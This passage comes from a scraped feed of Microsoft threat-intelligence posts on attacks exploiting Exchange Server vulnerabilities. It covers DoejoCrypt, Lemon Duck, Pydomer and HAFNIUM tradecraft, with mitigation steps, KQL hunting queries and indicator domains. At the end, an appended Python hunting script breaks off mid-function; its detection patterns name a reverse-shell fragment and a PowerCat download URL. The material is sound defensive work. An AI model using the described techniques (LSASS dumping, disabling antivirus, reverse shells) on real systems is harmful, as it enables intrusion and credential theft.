shellcode.\n\n\n\n_Figure 5. DoejoCrypt ransomware attack chain_\n\nDuring the hands-on-keyboard stage of the attack, a new payload is downloaded to _C:\\Windows\\Help_ with names like _s1.exe_ and _s2.exe_. 
This payload is the DoejoCrypt ransomware, which uses a _.CRYPT_ extension for the newly encrypted files and a very basic _readme.txt_ ransom note. In some instances, the time between _xx.bat_ being dropped and a ransomware payload running was under half an hour.\n\n\n\n_Figure 6. DoejoCrypt ransom note_\n\nWhile the DoejoCrypt payload is the most visible outcome of the attackers\u2019 actions, the access to credentials they have gained could serve them for future campaigns if organizations do not reset credentials on compromised systems. An additional overlapping activity observed on systems where _xx.bat_ was present and the attackers were able to get Domain Administrator rights was the running of scripts to snapshot Active Directory with _ntdsutil_\u2014an action that, if executed successfully, could give the attackers access to all the passwords in Active Directory from a single compromised system.\n\n## Lemon Duck botnet\n\nCryptocurrency miners were some of the first payloads we observed being dropped by attackers from the post-exploit web shells. In the first few days after the security updates were released, we observed multiple cryptocurrency miner campaigns, which had been previously targeting SharePoint servers, add Exchange Server exploitation to their repertoire. Most of these coin miners were variations on XMRig miners, and many arrived via a multi-featured implant with the capability to download new payloads or even move laterally.\n\nLemon Duck, a known cryptocurrency botnet named for a variable in its code, dove into the Exchange exploit action, adopting different exploit styles and choosing to use a fileless/web shell-less option of direct PowerShell commands from w3wp (the IIS worker process) for some attacks. 
While still maintaining their normal email-based campaigns, the Lemon Duck operators compromised numerous Exchange servers and moved in the direction of being more of a malware loader than a simple miner.\n\nUsing a form of the attack that allows direct execution of commands versus dropping a web shell, the Lemon Duck operators ran standard Invoke Expression commands to download a payload. Having used the same C2 and download servers for some time, the operators applied a varied degree of obfuscation to their commands on execution.\n\n\n\n_Figure 7. Example executions of Lemon Duck payload downloads_\n\nThe Lemon Duck payload is an encoded and obfuscated PowerShell script. It first removes various security products from the system, then creates scheduled tasks and a WMI event subscription for persistence. A second script is downloaded to attempt to evade Microsoft Defender Antivirus, abusing their administrative access to run the _Set-MpPreference_ command to disable real-time monitoring (a tactic that Microsoft Defender [Tamper protection](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-antivirus/prevent-changes-to-security-settings-with-tamper-protection>) blocks) and add scanning exclusions for the C:\\ drive and the PowerShell process.\n\n\n\n\n\n_Figure 8. Lemon Duck payloads_\n\nOne randomly named scheduled task connects to a C2 every hour to download a new payload, which includes various lateral movement and credential theft tools. The operators were seen to download RATs and information stealers, including [Ramnit](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Win32/Ramnit>) payloads.\n\n\n\n_Figure 9. Lemon Duck post-exploitation activities_\n\nIn some instances, the operators took advantage of having compromised mail servers to access mailboxes and send emails containing the Lemon Duck payload using various colorful email subjects.\n\n\n\n_Figure 10. 
Email subjects of possibly malicious emails_\n\n\n\n_Figure 11. Attachment variables_\n\nIn one notable example, the Lemon Duck operators compromised a system that already had _xx.bat_ and a web shell. After establishing persistence on the system in a non-web shell method, the Lemon Duck operators were observed cleaning up other attackers\u2019 presence on the system and mitigating the CVE-2021-26855 (SSRF) vulnerability using a legitimate cleanup script that they hosted on their own malicious server. This action prevents further exploitation of the server and removes web shells, giving Lemon Duck exclusive access to the compromised server. This stresses the need to fully investigate systems that were exposed, even if they have been fully patched and mitigated, per traditional incident response process.\n\n## Pydomer ransomware\n\nWhile DoejoCrypt was a new ransomware payload, the access gained by attackers via the on-premises Exchange Server vulnerabilities will likely become part of the complex cybercriminal economy where additional ransomware operators and affiliates take advantage of it. The first existing ransomware family to capitalize on the vulnerabilities was Pydomer. This ransomware family was previously seen using vulnerabilities in attacks, notably taking advantage of Pulse Secure VPN vulnerabilities, for which Pulse Secure has released security patches, to steal credentials and perform ransomware attacks.\n\nIn this campaign, the operators scanned and mass-compromised unpatched Exchange Servers to drop a web shell. They started later than some other attackers, with many compromises occurring between March 18 and March 20, a window when fewer unpatched systems were available. They then dropped a web shell, with a notable file name format: \u201cChack[Word][Country abbreviation]\u201d:\n\n\n\n_Figure 12. 
Example web shell names observed being used by the Pydomer attackers_\n\nThese web shells were observed on around 1,500 systems, not all of which moved to the ransomware stage. The attackers then used their web shell to dump a _test.bat_ batch file that performed a similar function in the attack chain to the _xx.bat_ of the DoejoCrypt operators and allowed them to perform a dump of the LSASS process.\n\n\n\n_Figure 13. Pydomer post-exploitation activities_\n\nThis access alone would be valuable to attackers for later attacks, similar to the credentials gained during their use of Pulse Secure VPN vulnerabilities. The highly privileged credentials gained from an Exchange system are likely to contain domain administrator accounts and service accounts with backup privileges, meaning these attackers could perform ransomware and exfiltration actions against the networks they compromised long after the Exchange Server is patched and even enter via different means.\n\nOn systems where the attackers did move to second-stage ransomware operations, they utilized a Python script compiled to an executable and the Python cryptography libraries to encrypt files. The attackers then executed a PowerShell script via their web shell that acts as a downloader and distribution mechanism for the ransomware.\n\n\n\n_Figure 14. PowerShell downloader and spreader used to get the Pydomer payload_\n\nThe script fetches a payload from a site hosted on a domain generation algorithm (DGA) domain and attempts to spread it throughout the network, first over WMI using Invoke-WMIMethod to connect to systems, and falling back to PowerShell remoting with Enter-PSSession if that fails. 
The script is run within the context of the web shell, which in most instances is Local System, so this lateral movement strategy is unlikely to work except in organizations that are running highly insecure and not recommended configurations like having computer objects in highly privileged groups.\n\nThe Pydomer ransomware is a Python script compiled to an executable and uses the Python cryptography libraries to encrypt files. The ransomware encrypts the files and appends a random extension, and then drops a ransom note named _decrypt_file.TxT_.\n\n\n\n_Figure 15. Pydomer ransom note_\n\nInterestingly, the attackers seem to have deployed a non-encryption extortion strategy. Following well-known ransomware groups like Maze and Egregor which leaked data for pay, the Pydomer hackers dropped an alternative _readme.txt_ onto systems without encrypting files. This option might have been semi-automated on their part or a side effect of a failure in their encryption process, as some of the systems they accessed were test systems that showed no data exfiltration. The note should be taken seriously if encountered, as the attackers had full access to systems and were likely able to exfiltrate data.\n\n\n\n_Figure 16. Pydomer extortion readme.txt_\n\n## Credential theft, turf wars, and dogged persistence\n\nIf a server is not running in a least-privilege configuration, credential theft could provide a significant return on investment for an attacker beyond their initial access to email and data. Many organizations have backup agent software and scheduled tasks running on these systems with domain admin-level permissions. 
For these organizations, the attackers might be able to harvest highly privileged credentials without lateral movement, for example, using the COM services DLL as a living-off-the-land binary to perform a dump of the LSASS process:\n\n\n\n_Figure 17. Use of COM services DLL to dump LSASS process_\n\nThe number of observed credential theft attacks, combined with the high privilege of accounts often given to Exchange servers, means that these attacks could continue to impact organizations that don\u2019t fully remediate after a compromise even after patches have been applied. While the observed ransomware attempts were small-scale or had errors, there is still the possibility of [more skillful groups](<https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/>) utilizing credentials gained in these attacks for later attacks.\n\nAttackers also used their access to perform extensive reconnaissance using built-in Exchange cmdlets and _dsquery_ to exfiltrate information about network configurations, user information, and email assets.\n\nWhile Lemon Duck operators might have had the boldest method for removing other attackers from the systems they compromised, they were not the only attacker to do so. Others were observed cleaning up .aspx and .bat files to remove other attackers, and even rebuilding the WMI database by deleting .mof files and restarting the service. As the window on unpatched machines closes, attackers showed increased interest in maintaining access to the systems they exploited. 
By utilizing "malwareless" persistence mechanisms like enabling RDP, installing Shadow IT tools, and adding new local administrator accounts, the attackers are hoping to evade incident response efforts that might focus exclusively on web shells, AV scans, and patching.\n\n## Defending against exploits and post-compromise activities\n\nAttackers exploit the on-premises Exchange Server vulnerabilities in combination to bypass authentication and gain the ability to write files and run malicious code. The best and most complete remediation for these vulnerabilities is to update to a supported Cumulative Update and to install all security updates. Comprehensive mitigation guidance can be found here: <https://aka.ms/ExchangeVulns>.\n\nAs seen in the post-exploitation attacks discussed in this blog, the paths that attackers can take after successfully exploiting the vulnerabilities are varied and wide-ranging. If you have determined or have reason to suspect that these threats are present on your network, here are immediate steps you can take:\n\n * Investigate exposed Exchange servers for compromise, regardless of their current patch status.\n * Look for web shells via our [guidance](<https://aka.ms/exchange-customer-guidance>) and run a full AV scan using the [Exchange On-Premises Mitigation Tool](<https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/>).\n * Investigate Local Users and Groups, even non-administrative users for changes, and ensure all users require a password for sign-in. 
New user account creations (represented by Event ID 4720) during the time the system was vulnerable might indicate a malicious user creation.\n * Reset and randomize local administrator passwords with a tool like [LAPS](<https://aka.ms/laps>) if you are not already doing so.\n * Look for changes to the RDP, firewall, WMI subscriptions, and Windows Remote Management (WinRM) configuration of the system that might have been configured by the attacker to allow persistence.\n * Look for Event ID 1102 to determine if attackers cleared event logs, an activity that attackers perform with _exe_ in an attempt to hide their tracks.\n * Look for new persistence mechanisms such as unexpected services, scheduled tasks, and startup items.\n * Look for Shadow IT tools that attackers might have installed for persistence, such as non-Microsoft RDP and remote access clients.\n * Check mailbox-level email forwarding settings (both _ForwardingAddress_ and _ForwardingSMTPAddress_ attributes), check mailbox inbox rules (which might be used to forward email externally), and check Exchange Transport rules that you might not recognize.\n\nWhile our response tools check for and remove known web shells and attack tools, performing a full investigation of these systems is recommended. For comprehensive investigation and mitigation guidance and tools, see <https://aka.ms/exchange-customer-guidance>.\n\nAdditionally, here are best practices for building credential hygiene and practicing the principle of least privilege:\n\n * Follow guidance to run Exchange in least-privilege configuration: <https://adsecurity.org/?p=4119>.\n * Ensure service accounts and scheduled tasks run with the least privileges they need. 
Avoid widely privileged groups like domain admins and backup operators and prefer accounts with access to just the systems they need.\n * Randomize local administrator passwords to prevent lateral movement with tools like [LAPS](<https://aka.ms/laps>).\n * Ensure administrators practice good administration habits like [Privileged Admin Workstations](<https://docs.microsoft.com/en-us/security/compass/overview>).\n * Prevent privileged accounts like domain admins from signing into member servers and workstations using Group Policy to limit credential exposure and lateral movement.\n\n## Appendix\n\n### Microsoft Defender for Endpoint detection details\n\n**Antivirus**\n\nMicrosoft Defender Antivirus detects exploitation behavior with these detections:\n\n * Behavior:Win32/Exmann\n * [Behavior:Win32/IISExchgSpawnEMS](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Behavior:Win32/IISExchgSpawnEMS.A&threatId=-2147212928>)\n * [Exploit:ASP/CVE-2021-27065](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Exploit:ASP/CVE-2021-27065>)\n * Exploit:Script/Exmann\n * Trojan:Win32/IISExchgSpawnCMD\n * [Behavior:Win32/IISExchgDropWebshell](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Behavior:Win32/IISExchgDropWebshell.B&threatId=-2147190469>)\n\nWeb shells are detected as:\n\n * [Backdoor:JS/Webshell](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:JS/WebShell&threatId=-2147233581>)\n * [Backdoor:PHP/Chopper](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:PHP/Chopper.B!dha&threatId=-2147231664>)\n * Backdoor:ASP/Chopper\n * Backdoor:MSIL/Chopper\n * [Trojan:JS/Chopper](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:JS/Chopper!dha&threatId=-2147232033>)\n * Trojan:Win32/Chopper\n * 
[Behavior:Win32/WebShellTerminal](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Behavior:Win32/WebShellTerminal.A&threatId=-2147213299>)\n\nRansomware payloads and associated files are detected as:\n\n * [Trojan:BAT/Wenam](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:BAT/Wenam.A&threatId=-2147188992>) - _xx.bat_ behaviors\n * [Ransom:Win32/DoejoCrypt](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/DoejoCrypt.A&threatId=-2147189904>) - DoejoCrypt ransomware\n * [Trojan:PowerShell/Redearps](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:PowerShell/Redearps.A&threatId=-2147189091>) - PowerShell spreader in Pydomer attacks\n * [Ransom:Win64/Pydomer](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win64/Pydomer.A&threatId=-2147189083>) - Pydomer ransomware\n\nLemon Duck malware is detected as:\n\n * [Trojan:PowerShell/LemonDuck](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:PowerShell/LemonDuck.A&threatId=-2147189579>)\n * [Trojan:Win32/LemonDuck](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/LemonDuck.A&threatId=-2147189576>)\n\nSome of the credential theft techniques highlighted in this report are detected as:\n\n * [Behavior:Win32/DumpLsass](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Behavior:Win32/DumpLsass.A!attk&threatId=-2147237471>)\n * Behavior:Win32/RegistryExfil\n\n**Endpoint detection and response (EDR)**\n\nAlerts with the following titles in the security center can indicate threat activity on your network:\n\n * Suspicious Exchange UM process creation\n * Suspicious Exchange UM file creation\n * Suspicious w3wp.exe activity in Exchange\n * Possible exploitation of Exchange Server vulnerabilities\n * 
Possible IIS web shell\n * Possible web shell installation\n * Web shells associated with Exchange Server vulnerabilities\n * Network traffic associated with Exchange Server exploitation\n\nAlerts with the following titles in the security center can indicate threat activity on your network specific to the DoejoCrypt and Pydomer ransomware campaign:\n\n * DoejoCrypt ransomware\n * Pydomer ransomware\n * Pydomer download site\n\nAlerts with the following titles in the security center can indicate threat activity on your network specific to the Lemon Duck botnet:\n\n * LemonDuck Malware\n * LemonDuck botnet C2 domain activity\n\nThe following behavioral alerts might also indicate threat activity associated with this threat:\n\n * Possible web shell installation\n * A suspicious web script was created\n * Suspicious processes indicative of a web shell\n * Suspicious file attribute change\n * Suspicious PowerShell command line\n * Possible IIS Web Shell\n * Process memory dump\n * A malicious PowerShell Cmdlet was invoked on the machine\n * WDigest configuration change\n * Sensitive information lookup\n * Suspicious registry export\n\n### Advanced hunting\n\nTo locate possible exploitation activities in Microsoft Defender for Endpoint, run the following queries.\n\n**Processes run by the IIS worker process**\n\nLook for processes executed by the IIS worker process\n\n`// Broadly search for processes executed by the IIS worker process. 
Further investigation should be performed on any devices where the created process is indicative of reconnaissance \nDeviceProcessEvents \n| where InitiatingProcessFileName == 'w3wp.exe' \n| where InitiatingProcessCommandLine contains \"MSExchange\" \n| where FileName !in~ (\"csc.exe\",\"cvtres.exe\",\"conhost.exe\",\"OleConverter.exe\",\"wermgr.exe\",\"WerFault.exe\",\"TranscodingService.exe\") \n| project FileName, ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\nSearch for PowerShell spawned from the IIS worker process, observed most frequently in Lemon Duck with Base64 encoding to obfuscate C2 domains\n\n`DeviceProcessEvents \n| where FileName =~ \"powershell.exe\" \n| where InitiatingProcessFileName =~ \"w3wp.exe\" \n| where InitiatingProcessCommandLine contains \"MSExchange\" \n| project ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\n**Tampering**\n\nSearch for Lemon Duck tampering with Microsoft Defender Antivirus\n\n`DeviceProcessEvents \n| where InitiatingProcessCommandLine has_all (\"Set-MpPreference\", \"DisableRealtimeMonitoring\", \"Add-MpPreference\", \"ExclusionProcess\") \n| project ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\n**Batch script actions**\n\nSearch for batch scripts performing credential theft, as observed in DoejoCrypt infections\n\n`DeviceProcessEvents \n| where InitiatingProcessFileName == \"cmd.exe\" \n| where InitiatingProcessCommandLine has \".bat\" and InitiatingProcessCommandLine has @\"C:\\Windows\\Temp\" \n| where ProcessCommandLine has \"reg save\" \n| project ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\nLook for evidence of batch script execution that leads to credential dumping\n\n`// Search for batch script execution, leading to credential dumping using rundll32 and the COM Services DLL, dsquery, and makecab use \nDeviceProcessEvents \n| where InitiatingProcessFileName =~ \"cmd.exe\" \n| where 
InitiatingProcessCommandLine has \".bat\" and InitiatingProcessCommandLine has @\"\\inetpub\\wwwroot\\aspnet_client\\\" \n| where InitiatingProcessParentFileName has \"w3wp\" \n| where FileName != \"conhost.exe\" \n| project FileName, ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\n**Suspicious files dropped under an aspnet_client folder**\n\nLook for dropped suspicious files like web shells and other components\n\n`// Search for suspicious files, including but not limited to batch scripts and web shells, dropped under the file path C:\\inetpub\\wwwroot\\aspnet_client\\ \nDeviceFileEvents \n| where InitiatingProcessFileName == \"w3wp.exe\" \n| where FolderPath has \"\\\\aspnet_client\\\\\" \n| where InitiatingProcessCommandLine contains \"MSExchange\" \n| project FileName, FolderPath, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\n**Checking for persistence on systems that have been suspected as compromised**\n\nSearch for creations of new local accounts\n\n`DeviceProcessEvents \n| where FileName == \"net.exe\" \n| where ProcessCommandLine has_all (\"user\", \"add\") \n| project ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\n**Search for installation events that were used to download ScreenConnect for persistence**\n\nNote that this query may be noisy and is not necessarily indicative of malicious activity alone.\n\n`DeviceProcessEvents \n| where FileName =~ \"msiexec.exe\" \n| where ProcessCommandLine has @\"C:\\Windows\\Temp\\\" \n| parse-where kind=regex flags=i ProcessCommandLine with @\"C:\\\\Windows\\\\Temp\\\\\" filename:string @\".msi\" \n| project filename, ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\n**Hunting for credential theft**\n\nSearch for logon events related to services and scheduled tasks on devices that may be Exchange servers. 
The results of this query should be used to verify whether any of these users have privileged roles that might have enabled further persistence.\n\n`let devices = \nDeviceProcessEvents \n| where InitiatingProcessFileName == \"w3wp.exe\" and InitiatingProcessCommandLine contains \"MSExchange\" \n| distinct DeviceId; \n// \nDeviceLogonEvents \n| where DeviceId in (devices) \n| where LogonType in (\"Batch\", \"Service\") \n| project AccountName, AccountDomain, LogonType, DeviceId, Timestamp`\n\nSearch for WDigest registry key modification, which allows the LSASS process to store plaintext passwords.\n\n`DeviceRegistryEvents \n| where RegistryValueName == \"UseLogonCredential\" \n| where RegistryKey has \"WDigest\" and RegistryValueData == \"1\" \n| project PreviousRegistryValueData, RegistryValueData, RegistryKey, RegistryValueName, InitiatingProcessFileName, InitiatingProcessCommandLine, InitiatingProcessParentFileName, DeviceId, Timestamp`\n\nSearch for the COM services DLL being executed by rundll32, which can be used to dump LSASS memory.\n\n`DeviceProcessEvents \n| where InitiatingProcessCommandLine has_all (\"rundll32.exe\", \"comsvcs.dll\") \n| project FileName, ProcessCommandLine, InitiatingProcessFileName, InitiatingProcessCommandLine, InitiatingProcessParentFileName, DeviceId, Timestamp`\n\nSearch for Security Account Manager (SAM) or SECURITY databases being saved, from which credentials can later be extracted.\n\n`DeviceProcessEvents \n| where FileName == \"reg.exe\" \n| where ProcessCommandLine has \"save\" and ProcessCommandLine has_any (\"hklm\\\\security\", \"hklm\\\\sam\") \n| project InitiatingProcessFileName, InitiatingProcessCommandLine, FileName, ProcessCommandLine, InitiatingProcessParentFileName, DeviceId, Timestamp`\n\n## Indicators\n\nSelected indicators from attacks are included here; the threats may utilize files and network indicators not represented here.\n\n**Files (SHA-256)**\n\nThe following are file hashes for some of the web 
shells observed during attacks:\n\nDoejoCrypt associated hashes:\n\nLemon Duck associated hashes:\n\nPydomer associated hashes:\n\n**Network indicators**\n\nDomains abused by Lemon Duck:\n\n * down[.]sqlnetcat[.]com\n * t[.]sqlnetcat[.]com\n * t[.]netcatkit[.]com\n\nPydomer DGA network indicators:\n\n * uiiuui[.]com/search/*\n * yuuuuu43[.]com/vpn-service/*\n * yuuuuu44[.]com/vpn-service/*\n * yuuuuu46[.]com/search/*\n\nThe post [Analyzing attacks taking advantage of the Exchange Server vulnerabilities](<https://www.microsoft.com/security/blog/2021/03/25/analyzing-attacks-taking-advantage-of-the-exchange-server-vulnerabilities/>) appeared first on [Microsoft Security.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": 
"2021-03-25T21:21:07", "type": "mmpc", "title": "Analyzing attacks taking advantage of the Exchange Server vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-27065"], "modified": "2021-03-25T21:21:07", "id": "MMPC:2FB5327A309898BD59A467446C9C36DC", "href": "https://www.microsoft.com/security/blog/2021/03/25/analyzing-attacks-taking-advantage-of-the-exchange-server-vulnerabilities/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-10T12:28:51", "description": "_**Update [03/08/2021]**: Microsoft continues to see multiple actors taking advantage of unpatched systems to attack organizations with on-premises Exchange Server. To aid defenders in investigating these attacks where Microsoft security products and tooling may not be deployed, we are releasing a feed of observed indicators of compromise (IOCs). The feed of malware hashes and known malicious file paths observed in related attacks is available in both JSON and CSV formats at the below GitHub links. 
This information is being shared as TLP:WHITE._\n\n * [CSV format](<https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Sample%20Data/Feeds/MSTICIoCs-ExchangeServerVulnerabilitiesDisclosedMarch2021.csv>)\n * [JSON format](<https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Sample%20Data/Feeds/MSTICIoCs-ExchangeServerVulnerabilitiesDisclosedMarch2021.json>)\n\n_**Update [03/05/2021]**: Microsoft sees increased use of these vulnerabilities in attacks targeting unpatched systems by multiple malicious actors beyond HAFNIUM. To aid customers in investigating these attacks, __Microsoft Security Response Center (MSRC) has provided additional resources, including new mitigation guidance: [Microsoft Exchange Server Vulnerabilities Mitigations \u2013 March 2021](<https://msrc-blog.microsoft.com/2021/03/05/microsoft-exchange-server-vulnerabilities-mitigations-march-2021/>)_\n\n_**Update [03/04/2021]**: The Exchange Server team released a script for checking HAFNIUM indicators of compromise (IOCs). See Scan Exchange log files for indicators of compromise._\n\n \n\nMicrosoft has detected multiple 0-day exploits being used to attack on-premises versions of Microsoft Exchange Server in limited and targeted attacks. In the attacks observed, the threat actor used these vulnerabilities to access on-premises Exchange servers which enabled access to email accounts, and allowed installation of additional malware to facilitate long-term access to victim environments. 
Microsoft Threat Intelligence Center (MSTIC) attributes this campaign with high confidence to [HAFNIUM](<https://blogs.microsoft.com/on-the-issues/?p=64505>), a group assessed to be state-sponsored and operating out of China, based on observed victimology, tactics and procedures.\n\nThe vulnerabilities recently being exploited were CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065, all of which were addressed in today\u2019s [Microsoft Security Response Center (MSRC) release - Multiple Security Updates Released for Exchange Server](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server>). We strongly urge customers to update on-premises systems immediately. Exchange Online is not affected.\n\nWe are sharing this information with our customers and the security community to emphasize the critical nature of these vulnerabilities and the importance of patching all affected systems immediately to protect against these exploits and prevent future abuse across the ecosystem. This blog also continues our mission to shine a light on malicious actors and elevate awareness of the sophisticated tactics and techniques used to target our customers. The related IOCs, [Azure Sentinel](<https://azure.microsoft.com/en-us/services/azure-sentinel/>) advanced hunting queries, and [Microsoft Defender for Endpoint](<https://www.microsoft.com/en-us/microsoft-365/security/endpoint-defender>) product detections and queries shared in this blog will help SOCs proactively hunt for related activity in their environments and elevate any alerts for remediation.\n\nMicrosoft would like to thank our industry colleagues at Volexity and Dubex for reporting different parts of the attack chain and their collaboration in the investigation. Volexity has also [published a blog post](<https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities>) with their analysis. 
It is this level of proactive communication and intelligence sharing that allows the community to come together to get ahead of attacks before they spread and improve security for all.\n\n## Who is HAFNIUM?\n\nHAFNIUM primarily targets entities in the United States across a number of industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks, and NGOs.\n\nHAFNIUM has previously compromised victims by exploiting vulnerabilities in internet-facing servers, and has used legitimate open-source frameworks, like [Covenant](<https://github.com/cobbr/Covenant>), for command and control. Once they\u2019ve gained access to a victim network, HAFNIUM typically exfiltrates data to file sharing sites like [MEGA](<https://mega.nz/>).\n\nIn campaigns unrelated to these vulnerabilities, Microsoft has observed HAFNIUM interacting with victim Office 365 tenants. While they are often unsuccessful in compromising customer accounts, this reconnaissance activity helps the adversary identify more details about their targets\u2019 environments.\n\nHAFNIUM operates primarily from leased virtual private servers (VPS) in the United States.\n\n## Technical details\n\nMicrosoft is providing the following details to help our customers understand the techniques used by HAFNIUM to exploit these vulnerabilities and enable more effective defense against any future attacks against unpatched systems.\n\n[CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>) is a server-side request forgery (SSRF) vulnerability in Exchange which allowed the attacker to send arbitrary HTTP requests and authenticate as the Exchange server.\n\n[CVE-2021-26857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>) is an insecure deserialization vulnerability in the Unified Messaging service. Insecure deserialization is where untrusted user-controllable data is deserialized by a program. 
Exploiting this vulnerability gave HAFNIUM the ability to run code as SYSTEM on the Exchange server. This requires administrator permission or another vulnerability to exploit.\n\n[CVE-2021-26858](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>) is a post-authentication arbitrary file write vulnerability in Exchange. If HAFNIUM could authenticate with the Exchange server then they could use this vulnerability to write a file to any path on the server. They could authenticate by exploiting the CVE-2021-26855 SSRF vulnerability or by compromising a legitimate admin\u2019s credentials.\n\n[CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>) is a post-authentication arbitrary file write vulnerability in Exchange. If HAFNIUM could authenticate with the Exchange server then they could use this vulnerability to write a file to any path on the server. They could authenticate by exploiting the CVE-2021-26855 SSRF vulnerability or by compromising a legitimate admin\u2019s credentials.\n\n## Attack details\n\nAfter exploiting these vulnerabilities to gain initial access, HAFNIUM operators deployed web shells on the compromised server. Web shells potentially allow attackers to steal data and perform additional malicious actions that lead to further compromise. 
One example of a web shell deployed by HAFNIUM, written in ASP, is below:\n\n\n\nFollowing web shell deployment, HAFNIUM operators performed the following post-exploitation activity:\n\n * Using Procdump to dump the LSASS process memory:\n\n\n\n * Using 7-Zip to compress stolen data into ZIP files for exfiltration:\n\n\n\n * Adding and using Exchange PowerShell snap-ins to export mailbox data:\n\n\n\n * Using the [Nishang](<https://github.com/samratashok/nishang>) Invoke-PowerShellTcpOneLine reverse shell:\n\n\n\n * Downloading PowerCat from GitHub, then using it to open a connection to a remote server:\n\n\n\nHAFNIUM operators were also able to download the Exchange offline address book from compromised systems, which contains information about an organization and its users.\n\nOur blog, [Defending Exchange servers under attack](<https://www.microsoft.com/security/blog/2020/06/24/defending-exchange-servers-under-attack/>), offers advice for improving defenses against Exchange server compromise. Customers can also find additional guidance about web shell attacks in our blog [Web shell attacks continue to rise.](<https://www.microsoft.com/security/blog/2021/02/11/web-shell-attacks-continue-to-rise/>)\n\n## Can I determine if I have been compromised by this activity?\n\nThe below sections provide indicators of compromise (IOCs), detection guidance, and advanced hunting queries to help customers investigate this activity using Exchange server logs, Azure Sentinel, Microsoft Defender for Endpoint, and Microsoft 365 Defender. 
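The post-exploitation command lines listed under Attack details, as an added example that is not part of the original post: a Python hunt over constructed 4688 process-creation records for the Nishang, PowerCat and Exchange snap-in strings that the Sentinel queries in this post match. Besides matching the raw CommandLine as those queries do, it decodes -EncodedCommand arguments (Base64 of UTF-16LE) so the same strings are found when the one-liner is passed encoded, the form a Base64-encoded PowerShell stage usually takes. Field names follow the SecurityEvent table; the hosts, accounts and events are constructed for the demo.

```python
"""Hunt 4688 process-creation records for the post-exploitation command lines
listed above (Nishang Invoke-PowerShellTcpOneLine, PowerCat download, Exchange
PowerShell snap-in). Added example; besides matching the raw CommandLine as the
Sentinel queries do, it decodes -EncodedCommand arguments (Base64 of UTF-16LE)
so encoded one-liners are caught as well. All events below are constructed."""
import base64
import re

RULES = {
    "nishang_reverse_shell": "$client = New-Object System.Net.Sockets.TCPClient",
    "powercat_download": "https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1",
    "exchange_snapin": "Add-PSSnapin Microsoft.Exchange.Powershell.Snapin",
}
SHELLS = ("cmd.exe", "powershell.exe", "powershell_ise.exe")
# PowerShell accepts any unambiguous prefix of -EncodedCommand.
ENC_ARG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

def decode_encoded_commands(cmdline):
    """The raw command line plus the decoded text of every -EncodedCommand argument."""
    texts = [cmdline]
    for blob in ENC_ARG.findall(cmdline):
        try:
            texts.append(base64.b64decode(blob, validate=True).decode("utf-16-le"))
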